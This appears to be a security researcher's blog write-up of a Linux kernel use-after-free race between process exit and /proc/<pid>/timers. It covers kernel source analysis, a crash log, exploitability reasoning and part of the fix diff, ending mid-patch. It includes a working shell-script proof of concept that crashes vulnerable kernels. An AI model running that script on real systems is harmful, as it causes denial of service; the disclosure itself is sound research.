Access Vector

chris@accessvector.net

Racing Cats to the Exit: A Boring Linux Kernel Use-After-Free

chris

Introduction

Kernel code that tears down processes when they exit can be interesting to audit from a vulnerability research point of view: by virtue of the process exiting, there are lots of resources that are up for the chop. It's not always obvious that some of those resources may still be accessible to other processes.

In this short article, I'll explore a fairly dull use-after-free in the Linux kernel that has lived in the process termination code for a number of years. It occurs for exactly this reason: a resource being torn down at exit is still reachable from another process. The vulnerability is dull only because there doesn't appear to be any way to exploit it beyond causing a DoS.

Figure: Proof-of-concept running on Debian 11.3.0.

The vulnerable part of the exit path has actually been there since 2005, but it only became a problem in 2013 with the introduction of /proc/<pid>/timers.

Either way, it affects a wide range of distributions over a long period of time, so that's something.

Vulnerability Details

The do_exit function is responsible for orchestrating the death of a process from the kernel's view of things. It's the last thing to run before a process is completely destroyed:

    void __noreturn do_exit(long code)
    {
        struct task_struct *tsk = current;
        int group_dead;
    ...
        group_dead = atomic_dec_and_test(&tsk->signal->live);
[1]     if (group_dead) {
    ...
    #ifdef CONFIG_POSIX_TIMERS
            hrtimer_cancel(&tsk->signal->real_timer);
[2]         exit_itimers(tsk->signal);
    #endif

There is no distinction between "threads" and "tasks" in Linux: a thread is just a task that happens to share a bunch of resources with some other tasks (memory maps, file descriptor tables, etc.). What we logically think of as a process is a "task group" inside the kernel.

When the last task in a group has exited, group_dead is true and we pick this up at [1]. Part of the logic then is to clear out any pending timers [2].

    /*
     * This is called by do_exit or de_thread, only when there are no more
     * references to the shared signal_struct.
     */
    void exit_itimers(struct signal_struct *sig)
    {
        struct k_itimer *tmr;
    
[3]     while (!list_empty(&sig->posix_timers)) {
[4]         tmr = list_entry(sig->posix_timers.next, struct k_itimer, list);
[5]         itimer_delete(tmr);
        }
    }

This is very simple: while there are still entries on the posix_timers list [3], we get a pointer to one [4] and delete it [5].

Notice that there are no locks being held here, but that seems entirely reasonable: we've got to this function because the last task in a task group has exited, so there should be no live references to the list.

A quick rg -w posix_timers shows this isn't necessarily true:

    % rg -w posix_timers
    kernel/time/posix-timers.c
    562:    list_add(&new_timer->list, &current->signal->posix_timers);
    1061:   while (!list_empty(&sig->posix_timers)) {
    1062:           tmr = list_entry(sig->posix_timers.next, struct k_itimer, list);
    
    kernel/fork.c
    1710:   INIT_LIST_HEAD(&sig->posix_timers);
    
    fs/proc/base.c
    2433:   return seq_list_start(&tp->task->signal->posix_timers, *pos);
    2439:   return seq_list_next(v, &tp->task->signal->posix_timers, pos);
    ...

It looks like there's something in procfs that could expose posix_timers to another process. Let's take a closer look.

The functions that ripgrep has drawn us to are timers_start and timers_next. These functions form part of the seq_file implementation for /proc/<pid>/timers, which is a procfs entry for exposing information about POSIX timers registered by a process.

seq_file is a really useful abstraction provided by procfs for implementing entries that represent a list or sequence. Providing information about a list of timers owned by a process would be a perfect example of how it's useful.

To implement a seq_file, part of the kernel needs to provide some function implementations and register itself with procfs. Then when userland reads from it, the Linux kernel basically does:

  1. Call the ->start implementation, calling the ->show implementation on the return value.
  2. Continuously call the ->next implementation, calling ->show on each return value until the total amount of data requested has been produced.
  3. Call the ->stop implementation.
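The calling convention in the steps above can be sketched in userland C. This is only an illustration of the start/show/next/stop ordering: `struct demo_seq_ops`, `demo_seq_read` and the array-backed `demo_ints_*` callbacks are hypothetical names of mine, not the kernel's seq_file API, and the real implementation also deals with offsets, partial reads and buffer growth that are ignored here.

```c
#include <stddef.h>
#include <stdio.h>

/* Hypothetical userland analogue of a seq_file operations table. */
struct demo_seq_ops {
    void *(*start)(void *priv, long *pos);
    void *(*next)(void *priv, void *v, long *pos);
    void (*stop)(void *priv, void *v);
    int (*show)(char *out, size_t len, void *v);
};

/* One "read": start, then show/next until the sequence or the buffer
 * runs out, then stop. Returns the number of records shown. */
static int demo_seq_read(const struct demo_seq_ops *ops, void *priv,
                         char *out, size_t len)
{
    long pos = 0;
    size_t used = 0;
    int shown = 0;
    void *v = ops->start(priv, &pos);

    while (v != NULL) {
        int n = ops->show(out + used, len - used, v);
        if (n < 0 || (size_t)n >= len - used) {
            if (used < len)
                out[used] = '\0';       /* discard the partial record */
            break;
        }
        used += (size_t)n;
        shown++;
        v = ops->next(priv, v, &pos);
    }
    ops->stop(priv, v);                 /* stop always pairs with start */
    return shown;
}

/* Example sequence: an array of ints, one record per element. */
struct demo_ints {
    const int *vals;
    long count;
    int stopped;
};

static void *demo_ints_at(struct demo_ints *d, long pos)
{
    return pos < d->count ? (void *)&d->vals[pos] : NULL;
}

static void *demo_ints_start(void *priv, long *pos)
{
    return demo_ints_at(priv, *pos);
}

static void *demo_ints_next(void *priv, void *v, long *pos)
{
    (void)v;
    return demo_ints_at(priv, ++*pos);
}

static void demo_ints_stop(void *priv, void *v)
{
    (void)v;
    ((struct demo_ints *)priv)->stopped = 1;
}

static int demo_ints_show(char *out, size_t len, void *v)
{
    return snprintf(out, len, "%d\n", *(const int *)v);
}

static const struct demo_seq_ops demo_ints_ops = {
    .start = demo_ints_start,
    .next = demo_ints_next,
    .stop = demo_ints_stop,
    .show = demo_ints_show,
};
```

The property that matters for the rest of this article is that anything acquired in start (a lock, a reference) stays held across every show and next call until stop runs.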

When the seq_file is opened, some context data is stashed in the private field of the struct seq_file (reached as m->private in the code below). This pointer is accessible inside the ->start, ->next, ->show and ->stop implementations and tells them what information to return.

For the /proc/<pid>/timers implementation, m->private points to a struct timers_private:

     struct timers_private {
         struct pid *pid;
         struct task_struct *task;
         struct sighand_struct *sighand;
         struct pid_namespace *ns;
         unsigned long flags;
     };

This provides the functions with all the information they need to provide a list of posix_timers to userland when the file is read.

Let's take a walk through the code here to understand how it works:

     static void *timers_start(struct seq_file *m, loff_t *pos)
     {
[6]      struct timers_private *tp = m->private;
     
[7]      tp->task = get_pid_task(tp->pid, PIDTYPE_PID);
         if (!tp->task)
             return ERR_PTR(-ESRCH);
     
[8]      tp->sighand = lock_task_sighand(tp->task, &tp->flags);
         if (!tp->sighand)
             return ERR_PTR(-ESRCH);
     
[9]      return seq_list_start(&tp->task->signal->posix_timers, *pos);
     }

Beginning with the timers_start implementation here, we see the opaque pointer cast to the right type [6] and the task resolved using the stashed pid [7]. The kernel stashes a pid rather than a task reference here because otherwise a task wouldn't be able to properly exit until all open /proc/<pid>/timers files were closed. It's a bit like holding a weak reference instead of a strong one.
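To make the weak-versus-strong distinction concrete, here is a minimal single-threaded sketch. Everything in it is hypothetical (`struct demo_task`, `demo_pid_table` and the `demo_*` helpers are my own stand-ins), and it has none of the RCU or locking that the real pid lookup relies on. It only shows the shape of the idea: the file remembers a pid, and each read upgrades it to a counted reference if the pid is still published.

```c
#include <stddef.h>

/* Hypothetical stand-in for a task; not the kernel's task_struct. */
struct demo_task {
    int pid;
    int refcount;   /* strong references currently held */
    int exiting;    /* set once the task has entered its exit path */
};

#define DEMO_MAX_PID 8
static struct demo_task *demo_pid_table[DEMO_MAX_PID];

/* Publish a task under its pid; the table itself holds one reference. */
static int demo_attach_pid(struct demo_task *t)
{
    if (t->pid < 0 || t->pid >= DEMO_MAX_PID || demo_pid_table[t->pid])
        return -1;
    t->refcount = 1;
    demo_pid_table[t->pid] = t;
    return 0;
}

/* Weak-to-strong upgrade: succeeds only while the pid is still published. */
static struct demo_task *demo_get_pid_task(int pid)
{
    struct demo_task *t;

    if (pid < 0 || pid >= DEMO_MAX_PID)
        return NULL;
    t = demo_pid_table[pid];
    if (t)
        t->refcount++;
    return t;
}

/* Drop one strong reference. */
static void demo_put_task(struct demo_task *t)
{
    t->refcount--;
}

/* Final teardown: unpublish the pid so later lookups fail. */
static void demo_detach_pid(struct demo_task *t)
{
    demo_pid_table[t->pid] = NULL;
    demo_put_task(t);
}
```

Note that in this sketch a task flagged as exiting still resolves until its pid is detached. That window, between starting to exit and disappearing from the pid table, is the one that matters later on.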

With the task resolved, the kernel then calls lock_task_sighand to get access to the sighand pointer [8]. This is immediately interesting because it tells us that accessing sighand must be done with that lock held. With that held, it's then safe to use the seq_list_start helper function to fetch the right element (at position pos) from the posix_timers list [9].

Continuing onto the next implementation:

     static void *timers_next(struct seq_file *m, void *v, loff_t *pos)
     {
         struct timers_private *tp = m->private;
[10]     return seq_list_next(v, &tp->task->signal->posix_timers, pos);
     }

Nice and simple. The kernel is still holding the sighand lock at this point, so the function is little more than a call to the seq_list_next helper [10]. That function fetches the right element from the list and advances the pos index.
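For reference, the two list helpers behave roughly like the userland sketch below. It is modelled on my reading of the kernel helpers rather than copied from them, and `struct demo_list` and the `demo_*` function names are hypothetical.

```c
#include <stddef.h>

/* Minimal circular doubly linked list, modelled on the kernel's list_head. */
struct demo_list {
    struct demo_list *next, *prev;
};

static void demo_list_init(struct demo_list *h)
{
    h->next = h->prev = h;
}

static void demo_list_add_tail(struct demo_list *n, struct demo_list *h)
{
    n->prev = h->prev;
    n->next = h;
    h->prev->next = n;
    h->prev = n;
}

/* Walk from the head and return the entry at index pos, or NULL if the
 * list is shorter than that. */
static struct demo_list *demo_seq_list_start(struct demo_list *head, long pos)
{
    struct demo_list *lh;

    for (lh = head->next; lh != head; lh = lh->next)
        if (pos-- == 0)
            return lh;
    return NULL;
}

/* Step to the following entry and bump *pos; NULL once back at the head. */
static struct demo_list *demo_seq_list_next(struct demo_list *v,
                                            struct demo_list *head, long *pos)
{
    struct demo_list *lh = v->next;

    ++*pos;
    return lh == head ? NULL : lh;
}
```

Neither helper validates the entry it is handed: the next step simply trusts v->next, which is why the list must not change underneath the iteration.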

Once the kernel is done fetching data from the seq_file, the stop implementation is called:

    static void timers_stop(struct seq_file *m, void *v)
    {
        struct timers_private *tp = m->private;
    
        if (tp->sighand) {
[11]        unlock_task_sighand(tp->task, &tp->flags);
            tp->sighand = NULL;
        }
    
        if (tp->task) {
[12]        put_task_struct(tp->task);
            tp->task = NULL;
        }
    }

Now the opposite of timers_start is performed: the sighand lock is released [11] and the reference on the task dropped [12].

For completeness, let's look at how a timer is shown:

    static int show_timer(struct seq_file *m, void *v)
    {
        struct k_itimer *timer;
        struct timers_private *tp = m->private;
        int notify;
        static const char * const nstr[] = {
            [SIGEV_SIGNAL] = "signal",
            [SIGEV_NONE] = "none",
            [SIGEV_THREAD] = "thread",
        };
    
[13]    timer = list_entry((struct list_head *)v, struct k_itimer, list);
        notify = timer->it_sigev_notify;
    
        seq_printf(m, "ID: %d\n", timer->it_id);
        seq_printf(m, "signal: %d/%px\n",
               timer->sigq->info.si_signo,
               timer->sigq->info.si_value.sival_ptr);
        seq_printf(m, "notify: %s/%s.%d\n",
               nstr[notify & ~SIGEV_THREAD_ID],
               (notify & SIGEV_THREAD_ID) ? "tid" : "pid",
               pid_nr_ns(timer->it_pid, tp->ns));
        seq_printf(m, "ClockID: %d\n", timer->it_clock);
    
        return 0;
    }

Coming into this function, v is the raw return value from the start or next implementations. In this case, the value is cast to the k_itimer pulled out of the posix_timers list [13] and various bits of information formatted from it.
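The list_entry step is plain pointer arithmetic. A minimal userland sketch, assuming a heavily trimmed and hypothetical `struct demo_timer` in place of the real k_itimer:

```c
#include <stddef.h>

struct demo_list {
    struct demo_list *next, *prev;
};

/* Hypothetical, heavily trimmed stand-in for struct k_itimer. */
struct demo_timer {
    struct demo_list list;   /* link on the per-process timer list */
    int it_id;
    int it_clock;
};

/* Recover the enclosing structure from a pointer to one of its members. */
#define demo_container_of(ptr, type, member) \
    ((type *)((char *)(ptr) - offsetof(type, member)))

/* What the list_entry line amounts to: no validation, just arithmetic. */
static struct demo_timer *demo_timer_from_link(void *v)
{
    return demo_container_of((struct demo_list *)v, struct demo_timer, list);
}
```

Because nothing here checks that v still points into a live object, a stale list pointer turns directly into a stale timer pointer.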

There are some key pieces of information here:

  1. The pid is resolved into a task on the fly to avoid holding a task reference.
  2. The sighand is locked before iterating over posix_timers.

Racing this logic with do_exit violates the assumption that justified not taking the sighand lock in exit_itimers. It seemed safe to traverse the list without the lock because the process was exiting, so by definition there should be no live references. But resolving the task through get_pid_task gives an external reader access at exactly the critical point. We can race the loop in exit_itimers [3] with a read from /proc/<pid>/timers, causing a use-after-free in show_timer as the timers are concurrently freed.

We don't actually need anything more than a little shell script to try this out:

    #!/bin/sh
    while :; do
            timeout 0.01 sleep 1 &
            TARGET=$!
            while cat /proc/$TARGET/timers >/dev/null 2>&1; do :; done
    done

That will continuously try to read the timers of a background timeout process. /usr/bin/timeout uses POSIX timers to implement its timeout logic, so it's an ideal victim.

Testing this out, we can see that we do indeed cause a kernel oops:

# tail -f /var/log/messages
Jul  4 21:27:19 debian kernel: [    2.343912] usb 1-4.1: SerialNumber: 1-0000:00:03.0-4.1
Jul  4 21:27:19 debian kernel: [    2.359373] SCSI subsystem initialized
Jul  4 21:27:19 debian kernel: [    2.363885] usb-storage 1-4.1:1.0: USB Mass Storage device detected
Jul  4 21:27:19 debian kernel: [    2.364537] scsi host0: usb-storage 1-4.1:1.0
Jul  4 21:27:19 debian kernel: [    2.364693] usbcore: registered new interface driver usb-storage
Jul  4 21:27:19 debian kernel: [    2.366976] usbcore: registered new interface driver uas
Jul  4 21:27:20 debian kernel: [    3.374506] scsi 0:0:0:0: CD-ROM            QEMU     QEMU CD-ROM      2.5+ PQ: 0 ANSI: 5
Jul  4 21:27:20 debian kernel: [    3.382554] scsi 0:0:0:0: Attached scsi generic sg0 type 5
Jul  4 21:27:20 debian kernel: [    3.390060] sr 0:0:0:0: [sr0] scsi3-mmc drive: 16x/50x cd/rw xa/form2 cdda tray
Jul  4 21:27:20 debian kernel: [    3.390063] cdrom: Uniform CD-ROM driver Revision: 3.20

Message from syslogd@debian at Jul  4 21:28:44 ...
 kernel:[   84.013346] Internal error: Oops: 96000004 [#1] SMP

Message from syslogd@debian at Jul  4 21:28:44 ...
 kernel:[   84.018666] Code: aa0003f4 a9025bf5 90005301 91300021 (b9403662)
Jul  4 21:28:44 debian kernel: [   84.013445] Modules linked in: sr_mod cdrom sg uas usb_storage scsi_mod joydev hid_generic usbhid hid aes_ce_blk crypto_simd snd_hda_codec_generic cryptd ledtrig_audio aes_ce_cipher ghash_ce gf128mul libaes snd_hda_intel snd_intel_dspcfg sha3_ce snd_hda_codec sha3_generic sha512_ce snd_hda_core nls_ascii sha512_arm64 snd_hwdep nls_cp437 sha2_ce snd_pcm virtio_gpu vfat virtio_dma_buf fat snd_timer snd sha256_arm64 virtio_console soundcore drm_kms_helper sha1_ce evdev efi_pstore qemu_fw_cfg drm fuse configfs efivarfs virtio_rng rng_core ip_tables x_tables autofs4 ext4 crc16 mbcache jbd2 crc32c_generic xhci_pci virtio_net net_failover virtio_blk failover xhci_hcd crct10dif_ce crct10dif_common usbcore virtio_pci usb_common virtio_mmio virtio_ring virtio
Jul  4 21:28:44 debian kernel: [   84.014760] CPU: 2 PID: 117611 Comm: cat Not tainted 5.10.0-15-arm64 #1 Debian 5.10.120-1
Jul  4 21:28:44 debian kernel: [   84.014920] Hardware name: QEMU QEMU Virtual Machine, BIOS 0.0.0 02/06/2015
Jul  4 21:28:44 debian kernel: [   84.015059] pstate: 80400085 (Nzcv daIf +PAN -UAO -TCO BTYPE=--)
Jul  4 21:28:44 debian kernel: [   84.015191] pc : show_timer+0x30/0xe0
Jul  4 21:28:44 debian kernel: [   84.015267] lr : seq_read_iter+0x3d4/0x4e0
Jul  4 21:28:44 debian kernel: [   84.015349] sp : ffff80001231bc80
Jul  4 21:28:44 debian kernel: [   84.015414] x29: ffff80001231bc80 x28: 0000000000000000
Jul  4 21:28:44 debian kernel: [   84.015519] x27: ffffd9624b9f2bf0 x26: 0000000000000000
Jul  4 21:28:44 debian kernel: [   84.015624] x25: ffff100806e2b560 x24: ffff100806e2b550
Jul  4 21:28:44 debian kernel: [   84.015728] x23: 0000000000000000 x22: ffff80001231bd50
Jul  4 21:28:44 debian kernel: [   84.015833] x21: ffff80001231bd78 x20: ffff100806e2b528
Jul  4 21:28:44 debian kernel: [   84.015938] x19: dead000000000100 x18: 00000000fffffffe
Jul  4 21:28:44 debian kernel: [   84.016042] x17: 0000000000000000 x16: 0000000000000000
Jul  4 21:28:44 debian kernel: [   84.016147] x15: 0000000000000020 x14: ffffffffffffffff
Jul  4 21:28:44 debian kernel: [   84.016252] x13: ffff1008033de000 x12: ffff1008033dd045
Jul  4 21:28:44 debian kernel: [   84.016399] x11: 0000000000000000 x10: 0000000000000000
Jul  4 21:28:44 debian kernel: [   84.016556] x9 : ffffd9624b1ae694 x8 : ffff1008033dd000
Jul  4 21:28:44 debian kernel: [   84.016713] x7 : ffff80001231bc80 x6 : ffffd9624b241680
Jul  4 21:28:44 debian kernel: [   84.016870] x5 : 0000000000000001 x4 : 0000000000000047
Jul  4 21:28:44 debian kernel: [   84.017027] x3 : 0000000000000001 x2 : ffffd9624b2415a0
Jul  4 21:28:44 debian kernel: [   84.017253] x1 : ffffd9624bca1c00 x0 : ffff100806e2b528
Jul  4 21:28:44 debian kernel: [   84.017412] Call trace:
Jul  4 21:28:44 debian kernel: [   84.017486]  show_timer+0x30/0xe0
Jul  4 21:28:44 debian kernel: [   84.017585]  seq_read_iter+0x3d4/0x4e0
Jul  4 21:28:44 debian kernel: [   84.017696]  seq_read+0xe8/0x140
Jul  4 21:28:44 debian kernel: [   84.017793]  vfs_read+0xb8/0x1e4
Jul  4 21:28:44 debian kernel: [   84.017889]  ksys_read+0x74/0x100
Jul  4 21:28:44 debian kernel: [   84.017988]  __arm64_sys_read+0x28/0x3c
Jul  4 21:28:44 debian kernel: [   84.018106]  el0_svc_common.constprop.0+0x80/0x1d0
Jul  4 21:28:44 debian kernel: [   84.018248]  do_el0_svc+0x30/0xa0
Jul  4 21:28:44 debian kernel: [   84.018356]  el0_svc+0x20/0x30
Jul  4 21:28:44 debian kernel: [   84.018447]  el0_sync_handler+0x1a4/0x1b0
Jul  4 21:28:44 debian kernel: [   84.018567]  el0_sync+0x180/0x1c0
Jul  4 21:28:44 debian kernel: [   84.018847] ---[ end trace 1537965dd187a7f3 ]---

The "oops" indicates that a kernel segmentation fault has occurred and the backtrace shows that it's where we expected it to be: inside show_timer.
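The value in x19, dead000000000100, looks like the kernel's list poison: as far as I can tell, list_del overwrites the next pointer of a removed entry with LIST_POISON1, which is 0x100 plus a per-architecture offset (0xdead000000000000 by default on arm64). The sketch below replays one losing interleaving deterministically in userland. The poison constants and all `demo_*` names are illustrative only, and since no threads are involved it shows the ordering rather than the race itself.

```c
#include <stddef.h>
#include <stdint.h>

struct demo_list {
    struct demo_list *next, *prev;
};

/* Illustrative poison values, in the spirit of LIST_POISON1/LIST_POISON2.
 * They are only ever compared, never dereferenced. */
#define DEMO_POISON1 ((struct demo_list *)(uintptr_t)0x100)
#define DEMO_POISON2 ((struct demo_list *)(uintptr_t)0x122)

static void demo_list_init(struct demo_list *h)
{
    h->next = h->prev = h;
}

static void demo_list_add_tail(struct demo_list *n, struct demo_list *h)
{
    n->prev = h->prev;
    n->next = h;
    h->prev->next = n;
    h->prev = n;
}

/* Unlink an entry and poison its pointers so stale users are easy to spot. */
static void demo_list_del(struct demo_list *e)
{
    e->prev->next = e->next;
    e->next->prev = e->prev;
    e->next = DEMO_POISON1;
    e->prev = DEMO_POISON2;
}

/* Replay one losing interleaving: the reader remembers an entry, the exit
 * path unlinks it, then the reader advances through the stale entry. */
static struct demo_list *demo_replay_race(void)
{
    struct demo_list head, a, b;
    struct demo_list *reader;

    demo_list_init(&head);
    demo_list_add_tail(&a, &head);
    demo_list_add_tail(&b, &head);

    reader = head.next;     /* reader: start returned the first entry */
    demo_list_del(&a);      /* exit path: unlinks that same entry */
    return reader->next;    /* reader: next now yields the poison value */
}
```

In the kernel, the following step would be show_timer treating that poison value as a timer and reading fields from it, which is consistent with the fault at show_timer+0x30.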

To understand whether we can do anything useful with this bug, we need to:

  1. Analyse what happens in itimer_delete to see what's being freed and how.
  2. Inspect what show_timer is doing with the freed data that may be interesting to control.

For a use-after-free to be exploitable, we need to be able to control the reallocation of the hole and place data there that can be used to our advantage.

Exploitability Analysis

Let's begin by dissecting itimer_delete:

    static void itimer_delete(struct k_itimer *timer)
    {
    retry_delete:
        spin_lock_irq(&timer->it_lock);
    
        if (timer_delete_hook(timer) == TIMER_RETRY) {
            spin_unlock_irq(&timer->it_lock);
            goto retry_delete;
        }
[1]     list_del(&timer->list);
    
        spin_unlock_irq(&timer->it_lock);
[2]     release_posix_timer(timer, IT_ID_SET);
    }

Aside from servicing any registered callback, the code here deletes the timer from the list [1] (that's posix_timers in our case) and then calls release_posix_timer [2].

    #define IT_ID_SET   1
    #define IT_ID_NOT_SET   0
    static void release_posix_timer(struct k_itimer *tmr, int it_id_set)
    {
        if (it_id_set) {
            unsigned long flags;
            spin_lock_irqsave(&hash_lock, flags);
[3]         hlist_del_rcu(&tmr->t_hash);
            spin_unlock_irqrestore(&hash_lock, flags);
        }
[4]     put_pid(tmr->it_pid);
[5]     sigqueue_free(tmr->sigq);
[6]     call_rcu(&tmr->rcu, k_itimer_rcu_free);
    }

Note that at [2] we call release_posix_timer with IT_ID_SET, which means the code will call hlist_del_rcu at [3]. This is because the timer is linked to from two places: firstly in the posix_timers list, which we know, but also in a global hash table.

Our VR senses should be tingling right now: since the timer is on more than one list, perhaps that's another vector to reaching it while it's being destroyed? It turns out that's a dead-end. There are only two places where that global hash table is accessed (search for t_hash in cscope):

    static struct k_itimer *__posix_timers_find(struct hlist_head *head,
                            struct signal_struct *sig,
                            timer_t id)
    {
        struct k_itimer *timer;
    
        hlist_for_each_entry_rcu(timer, head, t_hash,
                     lockdep_is_held(&hash_lock)) {
            if ((timer->it_signal == sig) && (timer->it_id == id))
                return timer;
        }
        return NULL;
    }
    
    static struct k_itimer *posix_timer_by_id(timer_t id)
    {
[7]     struct signal_struct *sig = current->signal;
        struct hlist_head *head = &posix_timers_hashtable[hash(sig, id)];
    
        return __posix_timers_find(head, sig, id);
    }
    
    static int posix_timer_add(struct k_itimer *timer)
    {
[8]     struct signal_struct *sig = current->signal;
        int first_free_id = sig->posix_timer_id;
        struct hlist_head *head;
        int ret = -ENOENT;
    
        do {
            spin_lock(&hash_lock);
            head = &posix_timers_hashtable[hash(sig, sig->posix_timer_id)];
            if (!__posix_timers_find(head, sig, sig->posix_timer_id)) {
                hlist_add_head_rcu(&timer->t_hash, head);
                ret = sig->posix_timer_id;
            }
            if (++sig->posix_timer_id < 0)
                sig->posix_timer_id = 0;
            if ((sig->posix_timer_id == first_free_id) && (ret == -ENOENT))
                /* Loop over all possible ids completed */
                ret = -EAGAIN;
            spin_unlock(&hash_lock);
        } while (ret == -ENOENT);
        return ret;
    }

Both of these routes use current->signal [7], [8], which means we can only pull out a reference to timers that our process owns. Since we'd be racing with do_exit to reach a use-after-free here, we know it's not possible to have either of those functions called concurrently. Code execution for current would have stopped at the point of do_exit running.
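A small sketch of why keying the lookup on the caller's own identity closes this route. The names here (`struct demo_sig`, `struct demo_ktimer`, `demo_timer_find`) and the hash function are hypothetical and much simpler than the kernel's, with no locking or RCU.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical stand-ins: an opaque per-process identity and a timer. */
struct demo_sig {
    int unused;
};

struct demo_ktimer {
    const struct demo_sig *owner;   /* which process created the timer */
    int id;
    struct demo_ktimer *hnext;      /* bucket chain */
};

#define DEMO_BUCKETS 16
static struct demo_ktimer *demo_table[DEMO_BUCKETS];

/* Arbitrary hash for the sketch; not the kernel's hash function. */
static unsigned int demo_hash(const struct demo_sig *sig, int id)
{
    uintptr_t mixed = ((uintptr_t)sig >> 4) ^ (uintptr_t)(unsigned int)id;

    return (unsigned int)(mixed % DEMO_BUCKETS);
}

static void demo_timer_add(struct demo_ktimer *t)
{
    unsigned int b = demo_hash(t->owner, t->id);

    t->hnext = demo_table[b];
    demo_table[b] = t;
}

/* Lookup on behalf of 'caller': an entry matches only if the caller owns it,
 * so another process can never pull out someone else's timer. */
static struct demo_ktimer *demo_timer_find(const struct demo_sig *caller, int id)
{
    struct demo_ktimer *t;

    for (t = demo_table[demo_hash(caller, id)]; t; t = t->hnext)
        if (t->owner == caller && t->id == id)
            return t;
    return NULL;
}
```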

It was worth exploring though.

Returning to release_posix_timer, we observe that there are a few fields that look like they could end up being freed: ->it_pid, ->sigq and, of course, the timer itself.

Before we concern ourselves with how they're freed and what data we might be able to place at their addresses, we should step back and go to the use-after-free site. We need to understand how those fields are actually used and see if there would be anything useful we could do even if we assumed 100% stable control of the reallocations.

There are three functions to consider that are tainted by the concurrent free:

  1. seq_list_start: used to fetch the first entry from posix_timers.
  2. seq_list_next: used to fetch the next entry from posix_timers.
  3. show_timer: used to write information about a timer into a buffer.

seq_list_start and seq_list_next are fairly simple to understand: they just walk the linked list until they reach the right timer. Freeing the timer concurrently to those functions could influence the list-walking code, but that doesn't seem very useful. At best, it means we could fully control the timer pointer passed to show_timer, which is worth bearing in mind.

show_timer does a few things:

     static int show_timer(struct seq_file *m, void *v)
     {
         struct k_itimer *timer;
         struct timers_private *tp = m->private;
         int notify;
         static const char * const nstr[] = {
             [SIGEV_SIGNAL] = "signal",
             [SIGEV_NONE] = "none",
             [SIGEV_THREAD] = "thread",
         };
     
         timer = list_entry((struct list_head *)v, struct k_itimer, list);
[9]      notify = timer->it_sigev_notify;
     
[10]     seq_printf(m, "ID: %d\n", timer->it_id);
[11]     seq_printf(m, "signal: %d/%px\n",
                timer->sigq->info.si_signo,
                timer->sigq->info.si_value.sival_ptr);
[12]     seq_printf(m, "notify: %s/%s.%d\n",
                nstr[notify & ~SIGEV_THREAD_ID],
                (notify & SIGEV_THREAD_ID) ? "tid" : "pid",
[13]            pid_nr_ns(timer->it_pid, tp->ns));
[14]     seq_printf(m, "ClockID: %d\n", timer->it_clock);
     
         return 0;
     }

We can see that all of the critical lines here basically just read primitive values from the potentially-freed data structures ([9], [10], [11], [12], [13] and [14]).

The only one I see here that's vaguely interesting (at a stretch) is notify [9], since that's used to index into a static const char *[]. With extreme effort and a favourable wind, maybe we'd be able to disclose a kernel pointer with that? It's barely worth pursuing if that's our best case scenario.
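To see how little room there is, here is the index computation in isolation. The constants carry the values from the Linux UAPI headers but are redefined under `DEMO_` names so the sketch does not depend on what a given libc exposes. The bounds-checked `demo_notify_name` is my own addition for illustration and is not something the kernel code does.

```c
#include <stddef.h>

/* Same values as SIGEV_SIGNAL, SIGEV_NONE, SIGEV_THREAD and
 * SIGEV_THREAD_ID on Linux, under hypothetical local names. */
enum {
    DEMO_SIGEV_SIGNAL = 0,
    DEMO_SIGEV_NONE = 1,
    DEMO_SIGEV_THREAD = 2,
    DEMO_SIGEV_THREAD_ID = 4
};

static const char *const demo_nstr[] = {
    [DEMO_SIGEV_SIGNAL] = "signal",
    [DEMO_SIGEV_NONE] = "none",
    [DEMO_SIGEV_THREAD] = "thread",
};

#define DEMO_NSTR_LEN (sizeof(demo_nstr) / sizeof(demo_nstr[0]))

/* Index that would be used for a given it_sigev_notify value
 * (converted to unsigned so negative inputs show up as huge indices). */
static unsigned int demo_notify_index(int notify)
{
    return (unsigned int)(notify & ~DEMO_SIGEV_THREAD_ID);
}

/* Bounds-checked lookup: NULL where an unchecked read would run past
 * the end of the three-entry table. */
static const char *demo_notify_name(int notify)
{
    unsigned int idx = demo_notify_index(notify);

    return idx < DEMO_NSTR_LEN ? demo_nstr[idx] : NULL;
}
```

With a legitimate notify value the index is always 0, 1 or 2. Only a corrupted field, such as 0x44 in the sketch, pushes it outside the table.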

It's tempting to say that we could replace the data pointed to by any of the timer, it_pid or sigq pointers with a different structure, thereby creating an information disclosure. Inspecting how these structures are allocated and freed shows that they all come from dedicated kmem_cache slab caches, though, so placing a heterogeneous type at the same virtual address (key to having a good amount of control over the fields) in a stable way is going to be very difficult. Even so, all we'd end up with is a lousy kernel pointer.

Sadly, from an exploitation point of view, that seems to be that. It looks like all we can really do is cause some bad pointers to be dereferenced, causing a kernel oops.

Patch

The fix works by taking the sighand lock inside exit_itimers and moving the list to a temporary local list before freeing the items. This is to avoid attempting to free while holding a spin lock:

diff --git a/fs/exec.c b/fs/exec.c
index 0989fb8472a1..778123259e42 100644
--- a/fs/exec.c
+++ b/fs/exec.c
@@ -1301,7 +1301,7 @@ int begin_new_exec(struct linux_binprm * bprm)
        bprm->mm = NULL;
 
 #ifdef CONFIG_POSIX_TIMERS
-       exit_itimers(me->signal);
+       exit_itimers(me);
        flush_itimer_signals();
 #endif
 
diff --git a/include/linux/sched/task.h b/include/linux/sched/task.h
index 505aaf9fe477..81cab4b01edc 100644
--- a/include/linux/sched/task.h
+++ b/include/linux/sched/task.h
@@ -85,7 +85,7 @@ static inline void exit_thread(struct task_struct *tsk)
 extern __noreturn void do_group_exit(int);
 
 extern void exit_files(struct task_struct *);
-extern void exit_itimers(struct signal_struct *);
+extern void exit_itimers(struct task_struct *);
 
 extern pid_t kernel_clone(struct kernel_clone_args *kargs);
 struct task_struct *create_io_thread(int (*fn)(void *), void *arg, int node);
diff --git a/kernel/exit.c b/kernel/exit.c
index f072959fcab7..64c938ce36fe 100644
--- a/kernel/exit.c
+++ b/kernel/exit.c
@@ -766,7 +766,7 @@ void __noreturn do_exit(long code)
 
 #ifdef CONFIG_POSIX_TIMERS
                hrtimer_cancel(&tsk->signal->real_timer);
-               exit_itimers(tsk->signal);
+               exit_itimers(tsk);
 #endif
                if (tsk->mm)
                        setmax_mm_hiwater_rss(&tsk->signal->maxrss, tsk->mm);
diff --git a/kernel/time/posix-timers.c b/kernel/time/posix-timers.c
index 1cd10b102c51..5dead89308b7 100644
--- a/kernel/time/posix-timers.c
+++ b/kernel/time/posix-timers.c
@@ -1051,15 +1051,24 @@ static void itimer_delete(struct k_itimer *timer)
 }
 
 /*
- * This is called by do_exit or de_thread, only when there are no more
- * references to the shared signal_struct.
+ * This is called by do_exit or de_thread, only when nobody else can
